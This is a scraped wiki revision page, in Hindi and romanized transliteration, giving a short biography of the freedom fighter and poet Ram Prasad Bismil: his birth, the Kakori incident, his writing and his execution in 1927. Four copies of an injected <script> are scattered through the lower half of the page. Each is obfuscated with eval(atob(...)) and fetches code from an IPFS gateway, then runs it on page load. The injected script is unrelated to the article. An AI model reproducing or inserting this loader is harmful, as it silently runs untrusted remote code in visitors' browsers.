Difference between revisions of "राम प्रसाद बिस्मिल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:लेखक (को हटा दिया गया हैं।))
Line 1: Line 1:
 +
[[चित्र:Ram-Prasad-Bismil.jpg|thumb|राम प्रसाद बिस्मिल]]
 
राम प्रसाद 'बिस्मिल' (जन्म- 11 जून, 1897 - मृत्यु- 19 दिसंबर, 1927) [[भारत]] के महान स्वतन्त्रता सेनानी ही नहीं, बल्कि उच्च कोटि के कवि, शायर, अनुवादक, बहुभाषाविद् व साहित्यकार भी थे जिन्होंने भारत की आज़ादी के लिये अपने प्राणों की आहुति दे दी।  
 
राम प्रसाद 'बिस्मिल' (जन्म- 11 जून, 1897 - मृत्यु- 19 दिसंबर, 1927) [[भारत]] के महान स्वतन्त्रता सेनानी ही नहीं, बल्कि उच्च कोटि के कवि, शायर, अनुवादक, बहुभाषाविद् व साहित्यकार भी थे जिन्होंने भारत की आज़ादी के लिये अपने प्राणों की आहुति दे दी।  
 
==जीवन परिचय==
 
==जीवन परिचय==
 
====जन्म====
 
====जन्म====
 
पंडित रामप्रसाद ‘बिस्मिल’ का जन्म [[उत्तर प्रदेश]] के [[शाहजहाँपुर]] ज़िले में [[11 जून]], 1897 को हुआ। यह वह समय था जब देश में राष्ट्रीय आन्दोलन ज़ोरों पर था। देश में ब्रिटिश हुक़ूमत के ख़िलाफ़ एक ऐसी लहर उठने लगी थी जो पूरे अंग्रेज़ी शासन को लीलने के लिए बेताब हो चली थी। बिस्मिल में भी बचपन से ही ब्रिटिश हुक़ूमत के ख़िलाफ़ एक गहरी नफ़रत घर कर गई। [[अशफ़ाक़ुल्लाह ख़ान]], [[चन्द्रशेखर आज़ाद]], [[भगतसिंह]], [[राजगुरु]], [[सुखदेव]] और ठाकुर रोशनसिंह जैसे क्रांतिकारियों से सम्पर्क में आने के बाद आपने अंग्रेज़ों की नाक में दम करना शुरू कर दिया। ब्रिटिश साम्राज्य को दहला देने वाले [[काकोरी कांड]] को आपने ही अंजाम दिया था।
 
पंडित रामप्रसाद ‘बिस्मिल’ का जन्म [[उत्तर प्रदेश]] के [[शाहजहाँपुर]] ज़िले में [[11 जून]], 1897 को हुआ। यह वह समय था जब देश में राष्ट्रीय आन्दोलन ज़ोरों पर था। देश में ब्रिटिश हुक़ूमत के ख़िलाफ़ एक ऐसी लहर उठने लगी थी जो पूरे अंग्रेज़ी शासन को लीलने के लिए बेताब हो चली थी। बिस्मिल में भी बचपन से ही ब्रिटिश हुक़ूमत के ख़िलाफ़ एक गहरी नफ़रत घर कर गई। [[अशफ़ाक़ुल्लाह ख़ान]], [[चन्द्रशेखर आज़ाद]], [[भगतसिंह]], [[राजगुरु]], [[सुखदेव]] और ठाकुर रोशनसिंह जैसे क्रांतिकारियों से सम्पर्क में आने के बाद आपने अंग्रेज़ों की नाक में दम करना शुरू कर दिया। ब्रिटिश साम्राज्य को दहला देने वाले [[काकोरी कांड]] को आपने ही अंजाम दिया था।
 +
[[चित्र:Bismil-Ashfaqua-stamp.jpg|thumb|बिस्मिल और [[अशफ़ाक़ुल्लाह ख़ान]] के सम्मान में जारी [[डाक टिकट]]]]
 
इतना ही नहीं अपनी क़लम के माध्यम से भी आप ब्रिटिश हुक़ूमत की [[आँख]] की किरकिरी बन गए। ‘सरफ़रोशी की तमन्ना’ जैसा अमर गीत लिखकर आपने क्रांति की वो चिंगारी छेड़ी जिसने ज्वाला का रूप लेकर ब्रिटिश शासन के भवन को लाक्षागृह में परिवर्तित कर दिया। राम प्रसाद बिस्मिल ने 'बिस्मिल अज़ीमाबादी' के नाम से भी काफ़ी शाइरी की। जीवन के अंतिम सफ़र में जब आपको गोरखपुर जेल भेजा गया तो आपने आत्मकथा भी लिखी।
 
इतना ही नहीं अपनी क़लम के माध्यम से भी आप ब्रिटिश हुक़ूमत की [[आँख]] की किरकिरी बन गए। ‘सरफ़रोशी की तमन्ना’ जैसा अमर गीत लिखकर आपने क्रांति की वो चिंगारी छेड़ी जिसने ज्वाला का रूप लेकर ब्रिटिश शासन के भवन को लाक्षागृह में परिवर्तित कर दिया। राम प्रसाद बिस्मिल ने 'बिस्मिल अज़ीमाबादी' के नाम से भी काफ़ी शाइरी की। जीवन के अंतिम सफ़र में जब आपको गोरखपुर जेल भेजा गया तो आपने आत्मकथा भी लिखी।
 
====मृत्यु====
 
====मृत्यु====

Revision as of 15:07, 10 June 2011

thumb|ram prasad bismil ram prasad 'bismil' (janm- 11 joon, 1897 - mrityu- 19 disanbar, 1927) bharat ke mahan svatantrata senani hi nahian, balki uchch koti ke kavi, shayar, anuvadak, bahubhashavidh v sahityakar bhi the jinhoanne bharat ki azadi ke liye apane pranoan ki ahuti de di.

jivan parichay

janm

pandit ramaprasad ‘bismil’ ka janm uttar pradesh ke shahajahaanpur zile mean 11 joon, 1897 ko hua. yah vah samay tha jab desh mean rashtriy andolan zoroan par tha. desh mean british huqoomat ke khilaf ek aisi lahar uthane lagi thi jo poore aangrezi shasan ko lilane ke lie betab ho chali thi. bismil mean bhi bachapan se hi british huqoomat ke khilaf ek gahari nafarat ghar kar gee. ashafaqullah khan, chandrashekhar azad, bhagatasianh, rajaguru, sukhadev aur thakur roshanasianh jaise kraantikariyoan se sampark mean ane ke bad apane aangrezoan ki nak mean dam karana shuroo kar diya. british samrajy ko dahala dene vale kakori kaand ko apane hi aanjam diya tha. [[chitr:Bismil-Ashfaqua-stamp.jpg|thumb|bismil aur ashafaqullah khan ke samman mean jari dak tikat]] itana hi nahian apani qalam ke madhyam se bhi ap british huqoomat ki aankh ki kirakiri ban ge. ‘sarafaroshi ki tamanna’ jaisa amar git likhakar apane kraanti ki vo chiangari chhe di jisane jvala ka roop lekar british shasan ke bhavan ko lakshagrih mean parivartit kar diya. ram prasad bismil ne 'bismil azimabadi' ke nam se bhi kafi shairi ki. jivan ke aantim safar mean jab apako gorakhapur jel bheja gaya to apane atmakatha bhi likhi.

mrityu

19 disambar, 1927 ko apako deshabhakti ke aparadh mean phaansi di gee.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>